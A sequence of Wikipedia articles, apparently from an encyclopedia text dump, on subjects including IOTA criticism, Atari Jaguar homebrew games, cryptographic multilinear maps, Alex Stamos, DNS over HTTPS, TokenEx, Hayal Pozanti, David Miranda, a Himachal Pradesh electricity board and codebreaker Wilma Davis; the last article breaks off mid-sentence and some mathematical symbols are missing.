In 2017, IOTA released the data marketplace, a pilot for a market where connected sensors or devices can store, sell or purchase data. The data marketplace was received critically by the cryptocurrency community over the extent of the involvement of the participants of the data marketplace, suggesting that "the IOTA Foundation was actively asking publications to use Microsoft’s name following the data marketplace announcement.". Izabelle Kaminska criticized a Jaguar press release: "our interpretation is that it's very unlikely Jaguar will be bringing a smart-wallet-enabled marketplace any time soon." Criticism IOTA promises to achieve the same benefits that blockchain-based DLTs bring - decentralization, distribution, immutability and trust - but remove the downsides of wasted resources associated with mining as well as transaction costs. However, several of the design features of IOTA are unusual, and it is unclear whether they work in practice. The security of IOTA's consensus mechanism against double-spending attacks is unclear, as long as the network is immature. Essentially, in the IoT, with heterogeneous devices having varying levels of low computational power, sufficiently strong computational resources will render the tangle insecure. This is a problem in traditional proof-of-work blockchains as well, however, they provide a much greater degree of security through higher fault tolerance and transaction fees. At the beginning, when there is a lower number of participants and incoming transactions, a central coordinator is needed to prevent an attack on the IOTA tangle. Critics have opposed role of the coordinator for being the single source of consensus in the IOTA network. Polychain Capital founder Olaf Carlson-Wee, says "IOTA is not decentralized, even though IOTA makes that claim, because it has a central "coordinator node" that the network needs to operate. If a regulator or a hacker shut down the coordinator node, the network would go down." This was demonstrated during the Trinity attack incident, when the IOTA foundation shutdown the coordinator to prevent further thefts. Following a discovered vulnerability in October 2017, the IOTA foundation transferred potentially compromised funds to addresses under its control, providing a process for users to later apply to the IOTA Foundation in order to reclaim their funds. Additionally, IOTA has seen several network outages as a result of bugs in the coordinator as well as DDoS attacks. During the seed generator scam, a DDoS network attack was abused leaving initial thefts undetected. In 2020, the IOTA Foundation announced that it would like to operate the network without a coordinator in the future, but implementation of this is still in an early development phase. References External links Official website Cryptocurrency projects Directed acyclic graphs
56822102
https://en.wikipedia.org/wiki/List%20of%20Atari%20Jaguar%20homebrew%20games
List of Atari Jaguar homebrew games
This is a list of titles for the Atari Jaguar and its CD add-on developed and released by independent developers and publishers. Many of the games present here have been released long after the end of the console's official life span in 1996, with the last officially licensed title released in 1998. Consequently, these homebrew games are not endorsed or licensed by Atari. After the properties of Atari Corporation were bought out by Hasbro Interactive in 1998, the rights and patents to the Jaguar were released into the public domain in 1999, declaring the console an open platform and opening the doors for homebrew development. Thanks to this, a few developers and publishers such as AtariAge, B&C Computervisions, Piko Interactive, Songbird Productions and Video61 continue to release previously unfinished games from the Jaguar's past life cycle, as well as new titles, to satisfy the system's cult following as of date. Homebrew games for the Atari Jaguar are released in either cartridge, CD or both formats to satisfy system owners. Titles released in the CD format are either glass mastered, or burned on regular CD-Rs however, since the add-on was released in very limited quantities, most homebrew developers publish their works either online on forums or on cartridge via independent publishers. Many of the cartridge releases are styled as retail Jaguar titles from the era. As both systems do not enforce regional locking all titles are region free but some titles, such as Gorf Classic and the initial release of Black Out! do not work correctly on PAL systems. Some of the earliest CD releases were not encrypted, requiring either B&C's Jaguar CD Bypass Cartridge or Reboot's Jagtopia (Freeboot) program burned into a CD in order to run unencrypted CD games, however Curt Vendel of Atari Museum released the binaries and encryption keys for both cartridge and CD formats, making it possible to run games without the need for development hardware. The first homebrew title programmed for the Jaguar dates back to 1995, which was a Jaguar version of Tetris called JSTetris (often referred as Jaguar Tetris or JagTris) developed using a hacked Jaguar (BJL, ROM replaced by custom software). The following list includes all of the post-release titles as of 2018, as well as homebrew games and demos made by the community. There has been an increase in the number of homebrew games being released for the Jaguar in recent years, which started in 2016 and 2017 saw the highest number of new titles released for the system since 1998. Post-release homebrew games Homebrew games and demos These are small games and demos made by multiple members and groups of the Jaguar homebrew community: Atari_Owl The Owl Project BadCoder BadCode0 BadCode1 BadCode2 BadCode3 BadCode4 BadCode4 C BadCode4 (Metal) BadCode4 (New Metal) Bastian "42bs" Schick JSTetris (1995) Mandelbrot Demo (1997) Bitjag Portland Retro Gaming Expo 2014 Welcome Demo Cedric "Orion" Bourse Diamjag Jungle Jag Lines Osmozys Retro-Gaming Connexion 2006 (demo) Sprite Checkpoint Embrace The Plasma (demo) j_ (demo) Morphonic Lab XIII: Contarum (demo) Sillyventure 2013 Invitation (demo) Christopher "Ninjabba" Vick The Maxx (demo) Chris "JagChris/A31Chris" Contreras Bomber Vs. Fighter Chris "atari2600land" Read Ants Stickman Clint "Mindthreat" Thompson Aurora64 Screen Saver (demo) The CAR Demo Dragonox (demo) Fish Fest Fury Jaguar Jukebox Midsummer Dreams S1M0N3 Space Defense: Project 1196 DrTypo Fallen Angels Fallen Angels Demo GemRace Shoot'em Up Tube Tube Second Edition Voxel Engine (demo) David "GT Turbo" Brylka Project Apocalypse Fadest Black Hole Dazed VS Project W S.P.A.C.E. Force Design Black Jag: Hyper Power League (demo) Legion Force Jidai: The Next Era! (demo) Fréderic "FrediFredo" Moreau Jaguar Hockey Legends '13 The Wolfenite Mine Graeme "LinkoVitch" Hinchliffe Reactris Holger Hannig JagCube (demo) JagPattern (demo) JagNes JagNes Invitation (demo) James "edarkness1" Garvin The Assassin (demo) Dark Guardian Episode 1: Unknown Enemy (demo) Jason "Zetanyx/MegaData" Data Native Spirit Jeff "rush6432" Nihlean Arkanna (demo) Pong Zero (demo) Kevin "sh3-rg" Dempsey Bexagon Blue KNIGHT\White Horse Boingy Uppy μFLY Lars "Starcat" Hieronymus Eerievale (demo) EJagfest 2000 (demo) HalMock FurBall - Sink or Swim Jaguar Development Club #1 (demo) Jaguar Development Club #2 (demo) JaguarMIND: Bomb Squad JagWorm Juiced Lost Treasures Ocean Depths Starcat Developments Demo Mark "GroovyBee" Ball Duckie Egg Mars Rover (demo) Moles Star Raiders (ST-to-Jaguar port) Matthieu "Matmook" Barreteau Dance Dance Xirius Space Party Do The Same Ladybugged The Quest Matthias "mdgames" Domin Balloon Clicks! Colors (demo) ColMouse JagMania JagMarble Mike "Tursi" Brent JagLion JagRotate Martian Attack OMF Kaboom Reboot Beebris Bad Apple (demo) Cloudy With A Chance Of Meatballs (demo) Degz Doger (demo) Downfall Expressway Full Circle: Rocketeer Promo Half Circle 8bitter HMS Raptor Kobayashi Maru Particle Playtime (demo) Project One Project Two Rocks Off! SuperFly DX Shit's Frozen 64 (demo) Tripper Getem (demo) Wiggle (demo) Robert Jurziga Drumpad Drumpad 2 Hubble Fade Hubble Nebula JSS Demo JSS Demo 2 PAULA Preview Demo PAULA Preview Demo 2 Sébastien "SebRmv" Briais Atomic Sebastian Mihai Jagmatch Steven "GORF" Scavone UFO (demo) Surrounded! Swapd0 Frontier: Elite II (ST-to-Jaguar port) Toarnold 2048 Gryzzles Vladimir "VladR" Repisky H.E.R.O. (demo) Klax3D S.T.U.N. Runner (demo) See also List of Atari Jaguar games List of cancelled Atari Jaguar games Lists of video games References Homebrew software Video game development Atari Jaguar
56835844
https://en.wikipedia.org/wiki/Cryptographic%20multilinear%20map
Cryptographic multilinear map
A cryptographic -multilinear map is a kind of multilinear map, that is, a function such that for any integers and elements , , and which in addition is efficiently computable and satisfy some security properties. It has several applications on cryptography, as key exchange protocols, identity-based encryption, and broadcast encryption. There exist constructions of cryptographic 2-multilinear maps, known as bilinear maps, however, the problem of constructing such multilinear maps for seems much more difficult and the security of the proposed candidates is still unclear. Definition For n = 2 In this case, multilinear maps are mostly known as bilinear maps or parings, and they are usually defined as follows: Let be two additive cyclic groups of prime order , and another cyclic group of order written multiplicatively. A pairing is a map: , which satisfies the following properties: Bilinearity Non-degeneracy If and are generators of and , respectively, then is a generator of . Computability There exists an efficient algorithm to compute . In addition, for security purposes, the discrete logarithm problem is required to be hard in both and . General case (for any n) We say that a map is a -multilinear map if it satisfies the following properties: All (for ) and are groups of same order; if and , then ; the map is non-degenerate in the sense that if are generators of , respectively, then is a generator of There exists an efficient algorithm to compute . In addition, for security purposes, the discrete logarithm problem is required to be hard in . Candidates All the candidates multilinear maps are actually slightly generalizations of multilinear maps known as graded-encoding systems, since they allow the map to be applied partially: instead of being applied in all the values at once, which would produce a value in the target set , it is possible to apply to some values, which generates values in intermediate target sets. For example, for , it is possible to do then . The three main candidates are GGH13, which is based on ideals of polynomial rings; CLT13, which is based approximate GCD problem and works over integers, hence, it is supposed to be easier to understand than GGH13 multilinear map; and GGH15, which is based on graphs. References Cryptography Multilinear algebra
56886069
https://en.wikipedia.org/wiki/Alex%20Stamos
Alex Stamos
Alex Stamos is a Greek American computer scientist and adjunct professor at Stanford University's Center for International Security and Cooperation. He is the former chief security officer (CSO) at Facebook. His planned departure from the company, following disagreement with other executives about how to address the Russian government's use of its platform to spread disinformation during the 2016 U.S. presidential election, was reported in March 2018. Early life Stamos grew up in Fair Oaks, California and graduated from Bella Vista High School in 1997. Stamos attended the University of California, Berkeley, where he graduated in 2001 with a degree in EECS. Career Stamos began his career at Loudcloud and, later, as a security consultant at @stake. iSEC Partners In 2004, Stamos co-founded iSEC Partners, a security consulting firm, with Joel Wallenstrom, Himanshu Dwivedi, Jesse Burns and Scott Stender. During his time at iSEC Partners, Stamos was well known for his research publications on vulnerabilities in forensics software and MacOS, Operation Aurora, and security ethics in the post-Snowden era. Stamos was an expert witness for a number of cases involving digital privacy, encryption, and free speech: EFF for their lawsuit against Sony BMG Google for their Google Street View case George Hotz Aaron Swartz iSEC Partners was acquired by NCC Group in 2010. Artemis Internet Following the acquisition of iSEC Partners by NCC Group, Stamos became the CTO of Artemis Internet, an internal startup at NCC Group. Artemis Internet petitioned ICANN to host a '.secure' gTLD on which all services would be required to meet minimum security standards Artemis ultimately acquired the right to operate the '.trust' gTLD from Deutsche Post to launch its services. Stamos filed and received five patents for his work at Artemis Internet. Yahoo! In 2014, Stamos joined Yahoo! as CSO. While at Yahoo!, he testified to Congress on online advertising and its impact on computer security and data privacy. He publicly challenged NSA Director Michael S. Rogers on the subject of encryption backdoors in February 2015 at a cybersecurity conference hosted by New America. Facebook In 2015, Stamos joined Facebook as CSO. During his time at Facebook, Stamos co-authored a whitepaper (with Jen Weedon and Will Nuland) on the use of social media to attack elections. He later delivered a keynote address at the Black Hat Briefings in 2017 on the need to broaden the definition of security and diversify the cybersecurity industry. Following disagreement with other executives about how to address the Russian government's use of its platform to spread disinformation during the 2016 U.S. presidential election, he made plans in 2018 to leave the company to take a research professorship at Stanford University. Stamos was interviewed about the Russian interference in the 2016 United States elections in the PBS Frontline documentary The Facebook Dilemma. Controversies During Stamos's tenure as the Chief Security Officer, Facebook was involved in numerous safety and security controversies including the Russian interference in the 2016 United States elections, failure to remove reported child-abuse images, inaction against disinformation campaigns in Philippines that targeted and harassed journalists, Facebook–Cambridge Analytica data scandal and the Rohingya genocide, for which the company has played a "determining role" according to the UN. Stamos said, as the CSO during the 2016 election season he "deserve as much blame (or more) as any other exec at the company," for Facebook's failed response to the Russian interference. Although the whitepaper Stamos coauthored only mentioned $100,000 ad spend for 3,000 ads connected to about 470 inauthentic accounts, it was later revealed that the Russian influence had reached 126 million Facebook users. While Cambridge Analytica harvested data from 87 million Facebook users before Stamos's tenure, Facebook did not notify its users until 2018, despite knowing about it as early as 2015, the year Stamos joined the company as the CSO. In July 2019, Facebook agreed to pay $100 million to settle with the U.S. Securities and Exchange Commission for misleading investors for more than two years (2015-2018) about the misuse of its users' data. Stanford University , Stanford University's Center for International Security and Cooperation lists Stamos as an adjunct professor, visiting scholar at the Hoover Institution, and director of the Stanford Internet Observatory. Krebs Stamos Group At the beginning of 2021, Stamos joined former CISA director Chris Krebs to form Krebs Stamos Group, a cybersecurity consultancy, which quickly landed its first customer, the recently-beleaguered SolarWinds. References Patents Securing client connections, filed April 11, 2012, granted July 14, 2015 Domain policy specification and enforcement, filed April 11, 2012, granted August 5, 2014 Computing resource policy regime specification and verification, filed May 9, 2014, granted August 11, 2014 Assessing a computing resource for compliance with a computing resource policy regime specification, filed May 9, 2014, granted March 24, 2015 Discovery engine, filed May 9, 2014, granted February 16, 2016 External links Alex Stamos on Twitter Krebs Stamos Group official web site Year of birth missing (living people) Chief security officers Facebook employees Living people MSNBC people Place of birth missing (living people) People associated with computer security University of California, Berkeley alumni Yahoo! employees
56903929
https://en.wikipedia.org/wiki/DNS%20over%20HTTPS
DNS over HTTPS
DNS over HTTPS (DoH) is a protocol for performing remote Domain Name System (DNS) resolution via the HTTPS protocol. A goal of the method is to increase user privacy and security by preventing eavesdropping and manipulation of DNS data by man-in-the-middle attacks by using the HTTPS protocol to encrypt the data between the DoH client and the DoH-based DNS resolver. By March 2018, Google and the Mozilla Foundation had started testing versions of DNS over HTTPS. In February 2020, Firefox switched to DNS over HTTPS by default for users in the United States. An alternative to DoH is the DNS over TLS (DoT) protocol, a similar standard for encrypting DNS queries, differing only in the methods used for encryption and delivery. On the basis of privacy and security, whether or not a superior protocol exists among the two is a matter of controversial debate, while others argue the merits of either depend on the specific use case. Technical details DoH is a proposed standard, published as RFC 8484 (October 2018) by the IETF. It uses HTTP/2 and HTTPS, and supports the wire format DNS response data, as returned in existing UDP responses, in an HTTPS payload with the MIME type application/dns-message. If HTTP/2 is used, the server may also use HTTP/2 server push to send values that it anticipates the client may find useful in advance. DoH is a work in progress. Even though the IETF has published RFC 8484 as a proposed standard and companies are experimenting with it, the IETF has yet to determine how it should best be implemented. The IETF is evaluating a number of approaches for how best to deploy DoH and is looking to set up a working group, Adaptive DNS Discovery (ADD), to do this work and develop a consensus. In addition, other industry working groups such as the Encrypted DNS Deployment Initiative, have been formed to "define and adopt DNS encryption technologies in a manner that ensures the continued high performance, resiliency, stability and security of the Internet's critical namespace and name resolution services, as well as ensuring the continued unimpaired functionality of security protections, parental controls, and other services that depend upon the DNS". Since DoH cannot be used under some circumstances, like captive portals, web browsers like Firefox can be configured to fallback to insecure DNS. Oblivious DNS-over-HTTPS Oblivious DoH is an Internet Draft proposing a protocol extension to ensure no single DoH server is aware of both the client's IP address and their message contents. All requests are passed via a proxy, hiding clients' addresses from the resolver itself, and are encrypted to hide their contents from the proxy. Deployment scenarios DoH is used for recursive DNS resolution by DNS resolvers. Resolvers (DoH clients) must have access to a DoH server hosting a query endpoint. Three usage scenarios are common: Using a DoH implementation within an application: Some browsers have a built-in DoH implementation and can thus perform queries by bypassing the operating system's DNS functionality. A drawback is that an application may not inform the user if it skips DoH querying, either by misconfiguration or lack of support for DoH. Installing a DoH proxy on the name server in the local network: In this scenario client systems continue to use traditional (port 53 or 853) DNS to query the name server in the local network, which will then gather the necessary replies via DoH by reaching DoH-servers in the Internet. This method is transparent to the end user. Installing a DoH proxy on a local system: In this scenario, operating systems are configured to query a locally running DoH proxy. In contrast to the previously mentioned method, the proxy needs to be installed on each system wishing to use DoH, which might require a lot of effort in larger environments. Software support Operating systems Apple Apple's iOS 14 and macOS 11 released in late 2020 support both DoH and DoT protocols. Windows In November 2019, Microsoft announced plans to implement support for encrypted DNS protocols in Microsoft Windows, beginning with DoH. In May 2020, Microsoft released Windows 10 Insider Preview Build 19628 that included initial support for DoH along with instructions on how to enable it via registry and command line interface. Windows 10 Insider Preview Build 20185 added graphical user interface for specifying a DoH resolver. DoH support is not included in Windows 10 21H2. Windows 11 has DoH support. Recursive DNS resolvers BIND BIND 9, an open source DNS resolver from Internet Systems Consortium added native support for DoH in version 9.17.10. PowerDNS DNSdist, an open source DNS proxy/load balancer from PowerDNS, added native support for DoH in version 1.4.0 in April 2019. Unbound Unbound, an open source DNS resolver created by NLnet Labs, has supported DoH since version 1.12.0, released in October 2020. It first implemented support for DNS encryption using the alternative DoT protocol much earlier, starting with version 1.4.14, released in December 2011. Unbound runs on most operating systems, including distributions of Linux, MacOS, and Windows. Web browsers Google Chrome DNS over HTTPS is available in Google Chrome 83 for Windows and macOS, configurable via the settings page. When enabled, and the operating system is configured with a supported DNS server, Chrome will upgrade DNS queries to be encrypted. It is also possible to manually specify a preset or custom DoH server to use within the user interface. In September 2020, Google Chrome for Android began staged rollout of DNS over HTTPS. Users can configure a custom resolver or disable DNS over HTTPS in settings. Microsoft Edge Microsoft Edge supports DNS over HTTPS, configurable via the settings page. When enabled, and the operating system is configured with a supported DNS server, Edge will upgrade DNS queries to be encrypted. It is also possible to manually specify a preset or custom DoH server to use within the user interface. Mozilla Firefox In 2018, Mozilla partnered with Cloudflare to deliver DoH for Firefox users that enable it (known as Trusted Recursive Resolver). On February 25, 2020, Firefox started enabling DNS over HTTPS for all US-based users, relying on Cloudflare's resolver by default. Opera Opera supports DoH, configurable via the browser settings page. By default, DNS queries are sent to Cloudflare servers. Public DNS servers DNS over HTTPS server implementations are already available free of charge by some public DNS providers. Implementation considerations Many issues with how to properly deploy DoH are still being resolved by the internet community including, but not limited to: Stopping third-parties from analyzing DNS traffic for security purposes Disruption of DNS-level parental controls and content filters Split DNS in enterprise networks CDN localization Analysis of DNS traffic for security purposes DoH can impede analysis and monitoring of DNS traffic for cybersecurity purposes; the 2019 DDoS worm Godlua used DoH to mask connections to its command-and-control server. In January 2021, NSA warned enterprises against using external DoH resolvers because they prevent DNS query filtering, inspection, and audit. Instead, NSA recommends configuring enterprise-owned DoH resolvers and blocking all known external DoH resolvers. Disruption of content filters DoH has been used to bypass parental controls which operate at the (unencrypted) standard DNS level; Circle, a parental control router which relies on DNS queries to check domains against a blocklist, blocks DoH by default due to this. However, there are DNS providers that offer filtering and parental controls along with support for DoH by operating DoH servers. The Internet Service Providers Association (ISPA)—a trade association representing British ISPs—and the also British body Internet Watch Foundation have criticized Mozilla, developer of the Firefox web browser, for supporting DoH, as they believe that it will undermine web blocking programs in the country, including ISP default filtering of adult content, and mandatory court-ordered filtering of copyright violations. The ISPA nominated Mozilla for its "Internet Villain" award for 2019 (alongside the EU Directive on Copyright in the Digital Single Market, and Donald Trump), "for their proposed approach to introduce DNS-over-HTTPS in such a way as to bypass UK filtering obligations and parental controls, undermining internet safety standards in the UK." Mozilla responded to the allegations by the ISPA, arguing that it would not prevent filtering, and that they were "surprised and disappointed that an industry association for ISPs decided to misrepresent an improvement to decades-old internet infrastructure". In response to the criticism, the ISPA apologized and withdrew the nomination. Mozilla subsequently stated that DoH will not be used by default in the British market until further discussion with relevant stakeholders, but stated that it "would offer real security benefits to UK citizens". Inconsistent DoH deployment Some DoH deployments are not an end-to-end encrypted, but rather only hop-to-hop encrypted because DoH is deployed only on a subset of connections. There are following types of connections: from client device (computer or a tablet) to local DNS forwarder (home or office router) from DNS forwarder to recursive DNS resolver (typically at the ISP) from recursive DNS resolver to authoritative DNS resolver (usually located in a data center) Every connection in the chain needs to support DoH for maximum security. See also DNS over TLS DNSCrypt DNSCurve EDNS Client Subnet References External links DNS Privacy Project: dnsprivacy.org DNS over HTTPS Implementations A cartoon intro to DNS over HTTPS DNS over HTTPS (DoH) Considerations for Operator Networks (draft, expired on 12 March 2020) Application layer protocols Web security exploits Domain Name System Internet protocols
56918452
https://en.wikipedia.org/wiki/TokenEx
TokenEx
TokenEx is a cloud-based data security company, headquartered in Tulsa, Oklahoma. The company was founded in 2010 by Alex Pezold. It provides solutions for coupling tokenization (data security), encryption, and key management for ensuring secure data. It specializes in the tokenization (data security) of sensitive customer data. Pezold said tokenization can translate “30 million credit card numbers into 30 million tokens,” in a very short time. The World Vision International is one of its clients using TokenEx platform. On 28 February 2018, The company announced its partnership with Cloud Constellation to design a space-based data security solution that layers tokenization and secure storage in space for securing customers' sensitive data. It won the 2016 Metro 50 Award and was recognized as the Metro 50’s fastest growing privately held company by the Greater Oklahoma City Chamber. See also Oklahoma Center for the Advancement of Science and Technology RSA Security References Computer security companies Software companies based in Oklahoma Software companies established in 2010 Former certificate authorities 2010 establishments in Oklahoma Security companies of the United States Software companies of the United States
56922165
https://en.wikipedia.org/wiki/Hayal%20Pozanti
Hayal Pozanti
Hayal Pozanti (born 1983, Istanbul, Turkey) is a Turkish-born artist, based in the United States. She is known for her large scale, brightly colored, seemingly abstract and geometric paintings, that represent statistical data related to human-computer interaction. Life and work Hayal Pozanti studied visual arts and visual communication design at Sabancı University in Istanbul and went on to study at Yale University, receiving a M.F.A. in painting and printmaking in 2011. Her work is informed by her ongoing exploration of "cyborg anthropology", which she describes as "a framework for understanding the effects of technology on human beings and culture". Her work Ciphers (2015) was a direct rendering of data into a glyph alphabet, and limiting herself to the creation of 31 characters. The paintings from Ciphers (2015) feature layered abstractions of the shapes, and were displayed in the gallery with abstract sculptures of similar shapes. Pozanti revisited this theme of alphabet in her work named Instant Paradise (2017), where again she has invented alphabet of 31 shapes. This lexicon is the source material for her paintings, sculptures, animations and sound pieces. Each shape in Instant Paradise has been assigned a number and a letter from the English alphabet, allowing her to literally 'translate' information through a personalized encryption system. She has created a typeface from her characters, as well as phonemes that she resources for her animations and her sound pieces, respectively. Pozanti's work is in several public collections, including Los Angeles County Museum of Art (LACMA), Eli and Edythe Broad Art Museum, JP Morgan, Fidelity Investments, and the San Jose Museum of Art. Exhibitions Solo exhibitions 2018 – Murmurs of Earth, Jessica Silverman Gallery, San Francisco, California 2017 – .tr, Dirimart, Istanbul, Turkey 2016 – Fuzzy Logic, Rachel Uffner Gallery, New York City, New York 2016 – Corpus, Levy.Delval, Brussels, Belgium 2015 – Deep Learning, Aldrich Contemporary Art Museum, Ridgefield, Connecticut 2015 – Scrambler, Halsey Mckay Gallery, East Hampton, New York 2015 – Ciphers, Jessica Silverman Gallery, San Francisco, California 2013 – Passwords, Duve, Berlin, Germany 2013 – New Paintings, Susanne Vielmetter Los Angeles Projects, Los Angeles, California 2012 – Co-Real, Jessica Silverman Gallery, San Francisco California Group exhibitions Pozanti's work has been featured in group exhibitions at Public Art Fund, Brooklyn Academy of Music, The Kitchen, MCA Santa Barbara, Cornell Fine Arts Museum, and the Sabanci Museum, Istanbul. References 1983 births Living people 21st-century Turkish women artists Artists from Istanbul Turkish women painters Yale University alumni
56929217
https://en.wikipedia.org/wiki/David%20Miranda%20%28politician%29
David Miranda (politician)
David Michael dos Santos Miranda (born 10 May 1985) is a Brazilian politician. He is a Federal Congressman representing the state of Rio de Janeiro, sworn in on 1 February 2019, and affiliated to the Democratic Labour Party (PDT), after switching parties from the Socialism and Liberty Party (PSOL) in 2022. Prior to that, he was a City Councilman representing the city of Rio de Janeiro. In 2019, Miranda was named by Time magazine as one of the world's next generation of new leaders. Activism and political work Miranda led the campaign for the Brazilian government to grant political asylum to Edward Snowden and worked with his husband, American journalist Glenn Greenwald to publish the revelations contained in Snowden's leaks detailing mass surveillance by the National Security Agency (NSA). He met with Luciana Genro, the PSOL candidate for the 2014 Brazilian presidential election, and obtained her commitment to extend asylum to Snowden if elected. Numerous public Brazilian figures supported the campaign, which failed to convince the government of Dilma Rousseff. In August 2013, Miranda was detained over his work on the NSA program for nine hours by the British government at London's Heathrow Airport under Schedule 7 of the Terrorism Act 2000, after he had flown in from Berlin and was changing to a plane bound for home, in Rio de Janeiro. His belongings were seized, including an external hard drive which, according to Greenwald, contained sensitive documents relevant to Greenwald's reporting, and which was encrypted with TrueCrypt encryption software. Greenwald described his partner's detention as "clearly intended to send a message of intimidation to those of us who have been reporting on the NSA and GCHQ". Miranda described his treatment by the UK authorities as "psychological torture". In 2014, Miranda interviewed Jair Bolsonaro for an article by Greenwald in The Intercept. At the time, Bolsonaro was a former army captain and a little known representative. In 2016, Miranda and his friend Marielle Franco, were elected as the first LGBT councillors in Rio's history. Miranda focuses primarily on the issues of the LGBT community and other marginalized segments of the Rio population. Miranda and his family have travelled in a bulletproof car since Franco was assassinated in March 2018. In 2018, Miranda was elected as a substitute for PSOL deputy Jean Wyllys. When Wyllys, an LGBT member, announced in January 2019 that he had left the country due to death threats, Miranda, who was also a PSOL member, took Wyllys' place in the Chamber of Deputies. After taking his seat, Miranda began to receive "hundreds" of death threats. Joice Hasselmann, a representative of the now-President Bolsonaro's party, accused Miranda of buying his seat. Due to the intimidation from Hasselmann and Bolsonaro supporters during the Vaza Jato reporting Greenwald was engaged in, Miranda disclosed that he had begun taking anti-depressants and that he and Greenwald rarely leave their home, and then only with hired bodyguards. On January 22, 2022, Miranda announced he was leaving the PSOL and joining the Democratic Labour Party (PDT) and endorsing its leader Ciro Gomes in the 2022 Brazilian general election. Personal life Miranda was raised in Jacarezinho, Rio de Janeiro. His mother died when he was five, and he moved in with an aunt. He left home when he was 13, dropped out of school, and worked in menial jobs for the next 6 years. He was playing volleyball on Ipanema beach in February 2005 when he knocked over the drink of Glenn Greenwald. The couple moved in together within a week. Soon after they first met, Greenwald encouraged Miranda's return to education and he graduated from Escola Superior de Propaganda e Marketing (ESPM) in 2014. Both Greenwald and Miranda are openly gay, and are married. In 2017, the couple adopted two children who are siblings. Controversies On 11 September 2019, O Globo newspaper reported that an investigation by a division of the Brazilian Ministry of the Economy identified R$2.5 million in suspicious transactions in Miranda's personal bank account during a one year period from 2018 to 2019, including deposits from current and former employees. As a result, the Public Ministry opened an investigation into his finances. According to media reports, investigators suspect Miranda of "concealing the origin" of the funds and participating in an illegal practice known as "", in which public servants employed in the offices of elected officials kick back a portion of their salary to their boss. Jair Bolsonaro's sons, Flavio Bolsonaro and Carlos Bolsonaro, are also under investigation for this practice. Glenn Greenwald accused the Brazilian Public Ministry, which represents prosecutors, of launching the investigation and leaking it for political reasons, due to his involvement in uncovering corruption and political bias among Brazilian prosecutors and judges involved in the Lava Jato operation. 2018 center-left presidential candidate Ciro Gomes and center-right pundit Reinaldo Azevedo both described the investigation against Miranda as borne out of a spirit of police state and political persecution. A few days afterwards, Miranda and Greenwald opened their bank accounts for public access, and challenged the Bolsonaro family to follow suit. References External links Official website (in Portuguese) 1985 births Living people Afro-Brazilian people Brazilian politicians of African descent LGBT Afro-Brazilians Gay politicians LGBT journalists from Brazil LGBT politicians from Brazil Socialism and Liberty Party politicians Members of the Chamber of Deputies (Brazil) from Rio de Janeiro (state) Municipal Chamber of Rio de Janeiro councillors LGBT legislators 21st-century LGBT people
56946727
https://en.wikipedia.org/wiki/Himachal%20Pradesh%20State%20Electricity%20Board
Himachal Pradesh State Electricity Board
Himachal Pradesh State Electricity Board Limited (HPSEBL) is a (state government undertaking) electricity board operating within the state of Himachal Pradesh, India, that generates and supplies power through a network of transmission, sub- transmission, and distribution lines. Himachal Pradesh State Electricity Board which was constituted on 1 September 1971 in accordance with the provisions of Electricity Supply Act (1948) and has been reorganized as Himachal Pradesh State Electricity Board Limited from 2010 under company act 1956. Restructuring The Himachal Pradesh State Electricity Board has been re-organized as Himachal Pradesh State Electricity Board Ltd. w.e.f. 14.06.2010 under Company Act.1956. Functions HPSEBL is responsible for the supply of Uninterrupted & Quality power to all consumers in Himachal Pradesh. Power is being supplied through a network of Transmission, Sub-Transmission & Distribution lines laid in the state. Since its inception, Board has made long strides in executing the targets entrusted to it. Himachal Pradesh Area Load Despatch Centre (HPALDC) Himachal Pradesh Area Load Despatch Center has been established to ensure integrated operation of the power system of HPSEBL with the Northern Region Load Dispatch Center of India to Monitor system parameters and security, System studies, planning and contingency analysis, Analysis of tripping and facilitating remedial measures, Daily scheduling and operational planning, Facilitating bilateral exchanges, Computation of energy dispatch and drawal values using SEMs, Augmentation of telemetry, computing and communication facilities. Generation Notable Achievements Himachal Pradesh achieved 100 percent Electrification in to all its census villages in the year 1988. Ensured 24 x 7 uninterrupted Power Supply. Himachal Pradesh has the honor of providing electricity at lowest tariff in the country. Himachal Pradesh achieved unique distinction of 100% metering, billing and collection. Achieved highest household/consumer coverage ratio in the country i.e. about 98% as per REC's survey & they have been adjudged one of the best Board's in the country. Installed and commissioned a power house at the highest altitude in the world (Rongtong Power House at an altitude of approx. 12,000 ft.). Installed and commissioned a totally underground Power House which is unique in Asia (Bhaba Power House – 120 MW). Introduced Hassle-free online Utility Bill Payments Systems. Started 128-bit SSL encryption – secure e-commerce systems. Ensured safe and timely Energy bills payments using Credit/Debit cards or Net-banking References External links Official Website http://portal.hpseb.in/irj/go/km/docs/internet/New_Website/Pages/Home.html Electricity Supply Act (1948) Indian Electricity Act State agencies of Himachal Pradesh Energy in Himachal Pradesh State electricity agencies of India Energy companies established in 1971 1971 establishments in Himachal Pradesh
56952863
https://en.wikipedia.org/wiki/Wilma%20Z.%20Davis
Wilma Z. Davis
Wilma Zimmerman Davis (31 March 1912 – 10 December 2001) was an early American codebreaker during World War II. She was a leading national cryptanalyst before and during World War II and the Vietnam War. She graduated with a degree in Mathematics from Bethany College and successfully completed navy correspondence course in cryptology. She began her career as a leading cryptanalyst which spanned over 30 years in the United States Army Signal Intelligence Service (SIS), a predecessor of the National Security Agency (NSA) in the 1930s. She was hired by William Friedman, who was a US cryptographer in the Army and led the research division of the Army’s Signal Intelligence in the 1930s. Wilma Davis worked as a cryptanalyst on the Italian, Japanese, Chinese, Vietnamese, and Russian problems. She also worked on the VENONA project. Early life and education She grew up in a steel town called Beech Bottom, West Virginia which had about 400 people, a church, a pool room, a drug store, and a company store. She had three siblings and her father worked for a steel company. She went to high school in Wellsburg, West Virginia and graduated in 1928. Wilma attended a small college - Bethany College which had about three hundred and fifty students at the time. She graduated with a degree in Mathematics in 1932. She was actively involved in college, so much so that she sometimes couldn’t make it home for Christmas. Her father gave her only a thousand dollars as she left college because that’s all he could afford to give her. Her mother passed away a few months before she graduated from college. Career After graduating from college, Wilma was meant to teach high school, but she ended up teaching first graders due to lack of jobs for high school teachers. After a year, she took a job in her hometown as a Math teacher, where she worked for four years and made about ninety dollars a month. Since teachers only worked for nine months in the year, she made about eight hundred and ten dollars a year. Due to the demise of her mother, Wilma was responsible for taking care of the house while her siblings were in high school. Thereafter, she worked in a payroll office and later as a code clerk at the unemployment census. Wilma Davis’ interest in cryptology was piqued after reading in the Washington Star about William and Elizabeth Freidman, who were American codebreakers. She was enrolled in some Navy correspondence courses in cryptology by her brother-in-law who was a civil servant. Davis relished the courses in cryptology and excelled in them. She decided to sit for the Civil Service exam and got on the civil service register. She worked at the National Bureau of Aeronautics (NBS) for about nine months before she received her civil service status. She worked at the Civil Service Commission as a junior Civil Service Examiner 